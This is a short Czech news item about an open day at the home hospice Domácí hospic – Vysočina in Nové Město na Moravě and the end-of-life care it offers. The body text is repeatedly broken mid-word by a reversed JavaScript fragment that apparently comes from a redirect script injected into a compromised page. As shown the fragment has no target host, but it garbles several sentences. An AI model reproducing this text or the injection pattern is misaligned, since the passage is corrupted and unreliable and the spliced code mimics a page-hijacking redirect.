Rainbow page separator

Novoměstský Domácí hospic – Vysočina otevře dveře návštěvníkům

Neděle, 1. října 2017

Domácí hospic Vysočina, o.p.s.

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Tradiční den otevřených dveří ve středu 4. října připravila obecně prospěšná společnost Domácí hospic – Vysočina. Zájemci mohou navštívit její sídlo na novoměstském Vratislavově náměstí, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v době mezi půl desá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou dopoledne a půl třetí odpoledne. „Lidé nás mohou přijít navštívit, popovídat si a podívat se na naše nové pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory, případně se seznámit se škálou zdravotnických pomůcek,“ přiblížil ředitel Domácího hospice – Vysočina Petr Havlíček.
Domácí hospic – Vysočina se už 13. rokem zabývá posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním péče umírajícím osobám v závěrečném stádiu života v jejich domácím prostředí, neboť na Vysočině neexistuje klasický kamenný hospic. K dispozici jsou taktéž dva takzvané rodinné pokoje v oddělení dlouhodobě nemocných v novoměstské nemocnici. Společnost rovněž poskytuje podporu a pomoc klientům v době po úmrtí jejich blízké osoby. Kromě střediska v Novém Městě na Moravě provozuje ještě středisko v Jihlavě a ve Velkém Meziříčí.